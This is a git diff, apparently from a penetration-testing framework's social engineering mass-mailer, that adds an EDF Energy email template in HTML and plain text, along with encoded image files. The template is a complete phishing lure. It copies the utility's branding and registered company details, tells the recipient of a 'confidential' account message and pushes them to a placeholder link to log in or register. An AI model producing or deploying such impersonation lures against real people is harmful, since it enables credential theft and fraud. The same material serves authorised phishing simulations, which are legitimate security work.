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
Y0RKlVx|w8LqW}N^07*qoM6N<$f(eBJ(f|Me

literal 0
HcmV?d00001

diff --git a/extensions/social_engineering/mass_mailer/templates/edfenergy/mail.html b/extensions/social_engineering/mass_mailer/templates/edfenergy/mail.html
new file mode 100644
index 000000000..1b93c888f
--- /dev/null
+++ b/extensions/social_engineering/mass_mailer/templates/edfenergy/mail.html
@@ -0,0 +1,54 @@
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
+<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF8">
+   <meta name="Generator" content="StreamServe MailOUT"><title>
+</title><style type="text/css">P {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px;}</style>
+</head><body><div><p><font face=MS Sans Serif color=#000000 size=1>
+    <table style="width:618px; border-collapse:collapse;">
+        <tr><td style="padding:28px; background-color: #ff5716;">
+            <table style="border-collapse:collapse; font-size:12px; width:562px;" cellpadding="0" cellspacing="0" border="0">
+                <tr><td style="padding: 0px; margin:0px; line-height:0px; width:28px; background-color:white; vertical-align:top;">
+                    <img src="cid:__cid1__" style="display:block; width:11px; height:11px;" />
+                </td><td colspan="2" style="width:379px; background-color:white;"></td>
+                    <td rowspan="3" colspan="2" style="padding: 0px; margin:0px; line-height:0px; background-color:white; vertical-align:top;">
+      <img src="cid:__cid2__" style="display:block; width:155px; height:291px; " alt="Cityscape" /></td></tr>
+<tr><td style="background-color:white;" rowspan="3"></td><td style="width:60px; vertical-align:top; background-color:white;">
+    <img src="cid:__cid3__" style="display:block; width:44px; height:65px;" alt="EDFEnergy" /></td>
+    <td style="width:315px; background-color:white;">
+        <h1 style="font-family: arial, sans-serif; font-weight:bold; font-size:16pt; color:#09357a; margin:0;">
+            Important information regarding your account</h1><br /></td></tr>
+<tr><td colspan="2" style="font-family: arial, sans-serif; font-size:11pt; color:#434343; width:375px; background-color:white; vertical-align:top;" >
+    <p style="margin: 16px 0px 16px 0px;"><span style="color:#09357a; font-weight: bold; font-size:13pt;" >
+Dear __name__</span></p><p style="margin-bottom:16px;">You have an important message regarding your EDF Energy account. </p>
+    <p style="margin-bottom:16px;">As this message contains confidential information you must
+        <a href="__link__" style="color: #013976;">click here</a> to view the message.</p>
+    <p style="margin-bottom:16px;">In order to read your messages you must be registered to MyAccount which you can do using the same link. </p>
+<br/><table style="border-collapse:collapse; width:292px; padding:0px;"><tr>
+    <td style="width:11px; background-color:#09357a; padding:0px; vertical-align:top;">
+        <img src="cid:__cid4__"
+             style="display:block; width:11px; height:26px;" /></td>
+    <td style="background-color: #09357a; color:white; width:282px; padding:0 0 0 5px; font-family:Arial; font-weight:bold; font-size:10pt;">
+        <a href="__link__" style="color:white; text-decoration:none;">Continue to MyMessages</a></td>
+    <td style="width:27px; background-color:#09357a; padding:0px; vertical-align:top;">
+        <img src="cid:__cid5__" style="display:block; width:27px; height:26px;" /></td></tr>
+    <tr><td colspan="3" style="width:293px; padding:0px;">
+        <img src="cid:__cid6__" style="display:block; width:293px; height:9px;" />
+        </td></tr></table></td></tr><tr><td colspan="2" style="width:375px; background-color:white;"></td>
+                <td colspan="2" style="text-align:right;background-color:white;">
+                    <img src="cid:__cid7__" style="display:block; float:right; width:95px; height:69px;" alt="London 2012" /></td></tr>
+<tr><td style="padding: 0px; margin:0px; line-height:0px; width:28px; background-color:white; vertical-align:bottom;">
+    <img src="cid:__cid8__" style="display:block; width:11px; height:11px;" /></td>
+    <td colspan="2" style="width:375px; background-color:white;"></td>
+    <td style="width:144px; background-color:white;">&nbsp;</td>
+    <td style="padding: 0px; margin:0px; line-height:0px; text-align:right; width:11px; background-color:white; vertical-align:bottom;">
+        <img src="cid:__cid9__" style="display:block; padding: 0px; margin: 0px; width:11px; height:11px;" />
+    </td>
+</tr>  </table></td></tr><tr>
+        <td style="padding: 0px;">
+            <img src="cid:__cid10__" style="display:block; width:618px; height:27px;" />
+        </td></tr><tr><td style="padding:15px 28px; background-color:#ffdecf;">
+        <p style="text-align:center; font-family: arial, sans-serif; font-weight:bold; font-size:9pt; color:#001f40;">
+            EDF Energy is a trading name used by EDF Energy Customers plc. Reg. No 02228297 whose registered office is at 40 Grosvenor Place, London, SW1X 7EN,
+incorporated in England and Wales. EDF Energy Customers plc. is a wholly owned subsidiary of EDF Energy plc.
+            The responsibility for performance of the supply obligations for all EDF Energy supply contracts rests with EDF Energy Customers plc.
+            <br /><br />The official Emblems of the London Organising Committee of the Olympic Games <br />and Paralympic Games Ltd are 2007 LOCOG. All rights reserved.</p></td></tr>
+</table></font></p></font></div></body></html>
\ No newline at end of file
diff --git a/extensions/social_engineering/mass_mailer/templates/edfenergy/mail.plain b/extensions/social_engineering/mass_mailer/templates/edfenergy/mail.plain
new file mode 100644
index 000000000..51a03989c
--- /dev/null
+++ b/extensions/social_engineering/mass_mailer/templates/edfenergy/mail.plain
@@ -0,0 +1,19 @@
+Important information regarding your account
+
+Dear __name__
+
+You have an important message regarding your EDF Energy account.
+
+As this message contains confidential information you must click here to view the message:
+__link__
+
+In order to read your messages you must be registered to MyAccount which you can do using the same link:
+__link__
+
+EDF Energy is a trading name used by EDF Energy Customers plc. Reg. No 02228297 whose registered office
+is at 40 Grosvenor Place, London, SW1X 7EN, incorporated in England and Wales. EDF Energy Customers plc.
+is a wholly owned subsidiary of EDF Energy plc. The responsibility for performance of the supply obligations
+for all EDF Energy supply contracts rests with EDF Energy Customers plc.
+
+The official Emblems of the London Organising Committee of the Olympic Games
+and Paralympic Games Ltd are © 2007 LOCOG. All rights reserved.
\ No newline at end of file
diff --git a/extensions/social_engineering/mass_mailer/templates/edfenergy/main.png b/extensions/social_engineering/mass_mailer/templates/edfenergy/main.png
new file mode 100644
index 0000000000000000000000000000000000000000..19a99bee71f2dfb9ff24800d3e0646c6207d3418
GIT binary patch
literal 56684
zcmV((K;XZLP)<h;3K|Lk000e1NJLTq005f+00AQi0ssI2s_o==0000PbVXQnQ*UN;
zcVTj606}DLVr3vnZDD6+Qe|Oed2z{QJOBXQ4oO5oRCwCty;+Q`*>NUzwtvsH_PT4|
zzJ0r!-OX;2O-fA-HL?khM#hXZmPYc}7{Ct(1~4GQ@B(;V48Qon#=s924Ex2vj13qv
z{Gb^PMjT0`C{Z3!Bd*P6?|t{R_N-k0^(>A!=l`>^s_t#xOR`0Yot;e9&C1IB^TdgW
zFCxB(Lya+H;r9Fg@Fk;_=lPvZ`{0GY(LH~q)oKfmQO<-2JU<D-*!Ke=JYtMeQtL_^
zNem|xZ}1N8(cS3rCr|up@rTndn7@t@!rV13{L&1!yubJZN(`aKP{ETG_S)Yg=bj}$
z^*61^?YGEa%e?W&<lp{FGCe%;d$#zG;q^B){6TZeg9zmfcM8j<r7C4v<aw55vpmbo
z62u9sNi;DEgu8Il_zM)m{D=9YyB!JU_)Xi}v7g-|ys{Q)eb-Ct`l%NiAsdp<%(d^5
zkHd{|a_JTF>Mzm%^q<h*`WE?n{{`{GM@n>j>)rWM+vP@~!0HjID5{CBR8bUJUKCYT
zX{GT6xb~pcdhxa>*Tv_}soPxGr*E}>(}yXpy{S*UMuO<*-`ls$cm9xktZs3K{zv~E
z{qKL5^wu6O(b@g$PHm2~hZ<A^v~AShwNaIk6<AzNq@mir#DFQFpxp3iG_gOJ1tHEK
z-TkyU=dZE<q>B;-qifK%>JxWH3|zYU;(u&6U!%h}zDM5qI{CQWE`Nsp4}U<GHXkC<
z>DG<8b{={O2#Z>IQdm7$Lrpp5f#AL;xL}Mk_iI>kSYNQd)TsHL*gGZ19-F&qerrE~
zx<?Hk#NaKPy#sefiIp7utQo^cl&`&WqPg8n`is8-uXLLZul(&lBOiS0V<*&=bM(Ld
zXGHiXC7N#Ewo8L6v+uR6>Y(*BR?M6+&+~#Xf?E&-!t*U^u_AA7q`9N7Lnr&tyQWqc
z_=9^ngF6KW0e8*_r;B&PDefc=zlTTSUd7->nY~4c`OFuaE3pm(Aj8#fe+)I1{GI>o
zq(rOXj$L!q(J2qCvZA)&V!@Jg4iGmC!z7APq@ED0L8#6?;?mFWR#Z-Mr|;A%oY4#(
zDL!&$H4^m_mD2uf{|SP_C#{)<m)RHKi&3Bibs8M}xl88qD~n&meDAB|V*->Gk;mWt
zP4KK@{_kw-26{y5d>ENBf7!uGxBX!OxyOURPm(Z*U?ssPW{Rr%1=@;~(c{?WM66Oj
zGBUT5xS<TK@hf$P6E{!&ta}gYHbE^c>fQ&h$iA8(cB7yC0`8Fe?;i>E^{?Q|E`R!C
zB+^!&{Ec5b($R9TU5j%utZ0BQswjF;h*Uimc+3}+32>#%t*%uW4yKXg4|Hx4kKe4&
z+2Sv)<n%-Dc9*!jK}9`&JHB!3miXCUp&L&h)700$Lax95@lw-QzIY_jV*j2Mr}KaW
zgA(H$XcNy+Ofzud5g`mba%c7If`T9grve{|U~mU<&u<)LjpF7`sLnz&wkRHYEPX)8
z38`sQ$F(k)S@@lCPt^9{=YQjvP~mUB`{j?9P%pi*Akl;Sc4g3iDa_MU*2@a}h`}fX
z3)bF&tUQX+<JvG~z^8F)RT#7u9VoLuz>{-j<c*Gz`9m#2E7)3n-A*D$TMF;mWjGKz
zS@T=}QlH8_H5LVgx^nKArhcr1+F51`uxM|dm^&oCi(($F-nAm3#l`<e0izCsk}|xb
zI2}e34R}3iIO(HO2S4iV-~ERV5$eYT{R)54>OQD_5+!@ow<=;z3zgQMi;@MK>ENxk
zug>6NxQY=6h8wKD<L{}}SVm78PjWgh_@fH-gii(Z`~EjR7Fogt9o<LNY9YxX35XHS
z*t)gVTD$djK-B&zibU71fCs%GYhtz5KYsU!Cy0k;nNWChkHQ_d!u%RsOmc*Zj}lG`
znIUJGt>M*mcw`jZYoI*8o$#sfhu{Ai<{v&L5>>Mi=I|P&8B^hO)ai=DKg2W@5XQ(O
zH0-opJ%M%SPg<OWv1Oe|uqxiv1s3fxJ}jp4pFo3836;F_b@PpX_3@DCc>gHrQ>S(p
z7LK08qE1adT%yOoiwiMMz03k0PKe7%aCbd)A#XwE%GzAalbK`?>ZO;DJ#+gl^W}f~
zQ;e1B41*l)H6GHfWt~*h1T*p)Y$dEU<(SB^5S1{4*#TzlG0{R>AL+8Q^R43SC&79f
zXLT;X1srug9)94>A5gc67+XkA%%c*_3|aGvHrX6`+-CQEsDwZJ?^EHKtKXULCUdw$
zzV#(i<@EW_|Mco;T{t!F!JJGm90d~Oq=ML|nvilK(bu>==LF{tu({jJI&G4MtjX=#
z#1nO!g}Qy=ex7HG8-roo50p^y12OZb{yqAIUth#_4gi~P|LdPxiR#JWF@tJ-R#Wbt
zi>{6mPe(HP)ZIM61z5vtxUG*hKVW88G<SBo5<upu<ar8_e5hPEFVo-n$H%XllK1|t
z{#XC2`QRHrjS`)Wm@7sSlA=E&4TZoKNL-x+Q*zvBW^9O0=McuYf|{#+QCA|z8m23V
z8hitV=?U_%SVh;$>+<|W7yxAq?%bvG-9<L&i8+0=T3nafj7tw2`WUK8K&W%9<SY&u
z?f_QO-}|GVLaaN7Gb1V%qr*j8b!1PQgdzOQ9;F@&(X4qyw&J*Xr?p2#UQw-p%~kQ{
zeuS6F0^p+Lv6B@){~P90U!1FHop5^VYx+z7ySetApC%n0l6rmUq47>E`aBOi-`Piy
zmCbD*F_sYYktCpx+u9~MzmVl{0)EWfGq0Lo`)?>|-oz>FV9R{t_kId^EpucvWc98m
zW6S_F5e!-Io76$3I<#-JiXN$}`7sEz0Y5Gk#cY1~MB=b<y)M;kZ8CYJU4LW-ll<C$
zX`cP;@n;SB;9KVZ{h##PU;pbZQ6npa@@~BhnOTV{R5@LPTw`er=(4Pf1fiN*b82+k
zsO$oP=tL%+oCqr)z1$A?vZJEP{2kEXv-(bi6*@=}Jg#^`iPl^g{laVV@BX7EUM4j>
z2jBntpUnRGZ%x1dXMb%anoXL7F8)`zFyChOj)J|$-z|XOkNkG@kq`MDuj@jNja1i&
zewfs@`Q_g<Fa7+9r}c36@K686`~TPfxbwZQ|233oK3!C&TFG=R()t-=783W=Ro71O
zq90;FpIC}V_oHywoPJN2!LY0&<fl;bxPH{suQW~O3*Z0J%lcRTb5ooAqsvaW?_B@V
z|NX}Q`A>Gg{}+Fqaz;8&afRxPxhqT73rS6r&pS%vfoVmP2r-GQ$t8p|30Y*T&?cyD
z3@$yTd5eVl(?t6t;>0`wX$(0|x;J&|Ni@*=31Z+QD@&QKVS!C){px?k@{E4vpPBl@
z-D}MB!L6$gZVg`l^K+m3`PK`c`|F^i>DU3*d0`q=w6?g9phq{EcT2bbh_8{7kG7t=
zcx&~|-~VsbYrlH>H~GQN@Gt&w`aA!N`tFy>;r3r?9W_N-uNrGuDK)my53yPEj)i)O
zO@ndGT(4@%=VPkN<HA#$lKnAkA9Lz`PuY<5r^kQ$H}~K9Hu>(qrgg%ysS{L%zWzGB
z{$1MNpqF0xE67Z1tge%k<>)B`>L;w3Rp?8t<!g#Dj`a@F0>_f1OWY!<8Z!-uf$Qjk
zHv8gOk%pa;--&*v6EW!A___;gxWx0fqRypj=86K3Cv0SGV~GG_9{YCMJ=pESYRF*m
z^KAXx^;iGC_u#?Bd*4JqbYeFhZezy(jXx&mp2PCa>V>~T5+!BckUAS@x!9Uw%wvNb
z`catN#Yp!fH@tN?OdIkV-CeqLclnw2==RTTJ*)tyB)R>zx%Cza6SDDiwRXvW>V>}o
zR=3LP1d1Ug()!p@(Zn=?=Lv>@S=6Jyj4<ZW68$l`anm#dVD?zgX>RT|=xn}z;nn9Z
zoo{{cdu0DcUHn<JCq<gR`_1jI{`28r&#YfQ|M|bwd+BF`?($E{k7h_ruqbJU)eodq
zYs}SSLKTpy*2YosT-aindI*EDX%s<bNsZ48=V-i`%SF(KwUa)PtFt9K(r_qhk8T>z
zE~#Y1N88H^MigGf6UL+SXxmsyqM4g<WF9MK6gR%6o?;bzX|6f4&8f+M?l&Tz&<9u9
z*MA4D%65=YCDmjy28A6B52n-6*3~cF{pKHy#^Z3~sm)J){_M-It-tu$_WHTMM5|ks
zZvA0_N{H>0IgzD5u@rLzYHB}<(l<5aHy?%O8Z&pdY~eEKQUB<VJ&|nJ!$x!s4#fTp
z+{g;9=FHRPKm5mKDTD8RSzi54I-5SYcl+@0px14uX_jSqnx>P<G)>>hwr<||{r_h&
zo`lQmXI^=2^QF(7`}EJPKmVzZTB12^z;4Ans%ev`afv`uQ)(Sk*6!^(N^~Vu><h+M
zQdDYJ&16S`<MGV?k0Q|~srylg@T7&PH~8_LY?lQEee>4dbV>q`$mp5i)yuc8zdiWi
zc6)zUSH)m(P!xGp$#%OPM`0MnJKK9@C99qL?|<cYuKw}A5T4Ldtz3Sgf8omV)1O$n
zc%}c;vn$WM^kc=kRc<#smLz9P*t(;s1JZeXYUWSXL27Mx5i!>NF773@$ED=7M9oPc
zdlc^cAeA`{V1%VD!nJUtxocMZVd8N{wKh%QRfl1Q=*2=H8dk~_(~3%1EswDEelPOX
z;b648we#LPf3|h!?b&#`HA?Qhb-SJI{Rii}oOy81^I|faR8slAXHyxd30hXLVmnvg
ze(?VHsmsdP(0=Xm3-R(=@7&X^^|N7j8HDY{2?+j&(otD9ITY(FYW4{+C%WqKS5{yR
zZNOa(tyv?k`0a8+*3q8wqvr82@rSB%qd>LQuY(&x&67%Wff3PonfVSg4@qetOUi&Z
zC4;Ois<NOaNrWth+4OLC>%oHu_p4HjCfPtoe-xjuWV*M#|Ji_iGSG}${Glxzp<GER
zHCS%#x(zIO3RP(T#=GRkyZ65HZ#?0ZRfWVYz*|KwJihV5r{Uscsru(GhTSE!RGznT
z`9+&JqwUQLVW$sQ$b)d{splGrHl(o<15NE{TF0bm9<?Y<J?$fKWk1m<fU<?JM~oX=
z01vFJ%$=KCZ@vDG%pUA-y?^6_w{PFPaX1`KXX?zkvq{@KI2i2h?ZL8tS*kA^p-3gA
zy6l@TtOgq~2?F1gl~TC#WhF5IptL81&BGzql1loX5C6)u3<Xd5-h1DZO2eNFuD_*J
z#W~2x2rjhC$1++~mFIaj9boASM(ZPoRc9I+Giys}O>WiHZN9axXxB(Yh-d5$ww?!D
zJ8g;l2jp364Sqzd!WcVcW}SALrc%J_zHZ~X6WI^FtLoI(LgIQ(ZZLHwA3wL^U@c3k
zqE07x^>fd9rugmu<99!J=bMAU5Fk)iO6CXao9o;6t{W31(dypbezz4xkr>YKJ+5Zu
zjr#@XB`kfHv9nZOiO5<gT+0}U9NZV@K1d76m5k`Jg8v7vP)a3S6Ie}%x82!RsII{i
zrN~85ltB=Bp6@aY#XO%fLv+_9gX$EKKFa@*d3Mh<LZvqOLTVlfV<)J&A02o(o_Ay)
zp|;w%O=7i&XET*f%Q*Dz+}~MS>Z%KylhM%QbW)bDeCnmu<>hPdebDZD9@CT~E4I=)
zPQvMQ76cwF45%Z3rUOlO75UDHgYt4AgwHoS!C5m~_0%W&aT54dr7T6uC>ue-1#sKj
zr<BAuk&<u$I|Dp4EC9#GcrelMwBlR|9E3p^=aN`_U``MKA0Ejpa6%f^JY$;9z0yzC
zZ2lN_jbo{~+#@1JV>&*)b#v?Y{`4yccdwFkxV3i(sx+FUORMYL_a5vHhJ_h#@3&fk
zHu5l?w0I}-xuf-f>=?rlG9V0qN8nYtC(1Gdi*$FG-<1@Q@mGd2@I6L-c-?T8b(o5M
z{%lx*WsSo4Ovw5STsaf0hAa}zHv{|(H;eG7Kmx-&14JoAFAy=;u_mS(^eN*x*9_+D
zU9F!D4q}v$A32}CSaEx3&i)j@(odFGoPUsZd(YVL(`An5K+6W^Mp#yb3c&--)O&Ys
zJ-GEI&-cIc^)G>QC^XqQ7<ZS~zwkGIA&8@|{mH)>52pnDWaYuf6s4l9kU1E^96(T(
z6`m)QQn{`GH!B<}gZ^2~42Z<{LMcleE#w!T2*8xaL0m}G$FC1FfXK#-<8}m+12+g^
